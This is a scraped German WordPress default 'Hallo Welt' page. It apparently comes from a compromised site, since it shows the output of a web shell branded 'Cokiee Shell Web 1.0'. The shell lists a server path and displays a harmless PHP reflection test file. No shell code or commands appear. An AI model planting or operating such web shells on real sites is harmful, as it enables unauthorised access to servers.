Willkommen bei WordPress. Dies ist dein erster Beitrag. Bearbeite oder lösche ihn und beginne mit dem Schreiben!
Hallo Welt!
von raredesign | Dez 3, 2019 | Allgemein | 0 Kommentare
Cokiee Shell
Current Path : /usr/local/src/php7/php-7.0.5/ext/reflection/tests/ |
Current File : //usr/local/src/php7/php-7.0.5/ext/reflection/tests/ReflectionExtension_bug66218.phpt |
--TEST-- ReflectionExtension::getFunctions() ##6218 zend_register_functions breaks reflection --SKIPIF-- <?php if (!extension_loaded('reflection')) print 'skip missing reflection extension'; if (PHP_SAPI != "cli") die("skip CLI only test"); if (!function_exists("dl")) die("skip need dl"); ?> --FILE-- <?php $r = new ReflectionExtension('standard'); $t = $r->getFunctions(); var_dump($t['dl']); ?> Done --EXPECTF-- object(ReflectionFunction)#%d (1) { ["name"]=> string(2) "dl" } Done
Cokiee Shell Web 1.0, Coded By Razor
Neueste Kommentare